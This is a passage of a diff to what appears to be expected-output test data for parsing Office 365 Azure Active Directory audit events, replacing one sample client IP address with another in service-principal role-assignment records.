"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:17:00\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"b2484c3c-5461-43ab-850b-70fccf706796\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:00.2133065Z\"},{\"Name\":\"env_epoch\",\"Value\":\"OLE3R\"},{\"Name\":\"env_seqNum\",\"Value\":\"55908032\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##53a69eec-6bcd-473f-9c68-150d680e0776_00000000-0000-0000-0000-000000000000_53a69eec-6bcd-473f-9c68-150d680e0776\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR551\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"31d7436e-85aa-4aee-a945-6a0ff51ea975\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -10590,9 +10590,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-10T15:17:00", "ExtendedProperties": [ { @@ -10826,7 +10826,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:17:00\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"b2484c3c-5461-43ab-850b-70fccf706796\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:00.2133065Z\"},{\"Name\":\"env_epoch\",\"Value\":\"OLE3R\"},{\"Name\":\"env_seqNum\",\"Value\":\"55908041\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##53a69eec-6bcd-473f-9c68-150d680e0776_00000000-0000-0000-0000-000000000000_53a69eec-6bcd-473f-9c68-150d680e0776\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR551\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"7bca6665-4d58-4df9-bd34-4d92e1fc63aa\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:17:00\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"b2484c3c-5461-43ab-850b-70fccf706796\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:00.2133065Z\"},{\"Name\":\"env_epoch\",\"Value\":\"OLE3R\"},{\"Name\":\"env_seqNum\",\"Value\":\"55908041\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##53a69eec-6bcd-473f-9c68-150d680e0776_00000000-0000-0000-0000-000000000000_53a69eec-6bcd-473f-9c68-150d680e0776\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR551\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"7bca6665-4d58-4df9-bd34-4d92e1fc63aa\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -10856,9 +10856,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-10T15:17:00", "ExtendedProperties": [ { @@ -11092,7 +11092,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:17:00\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"b2484c3c-5461-43ab-850b-70fccf706796\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:00.2133065Z\"},{\"Name\":\"env_epoch\",\"Value\":\"OLE3R\"},{\"Name\":\"env_seqNum\",\"Value\":\"55908041\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##53a69eec-6bcd-473f-9c68-150d680e0776_00000000-0000-0000-0000-000000000000_53a69eec-6bcd-473f-9c68-150d680e0776\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR551\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"7bca6665-4d58-4df9-bd34-4d92e1fc63aa\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:17:00\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\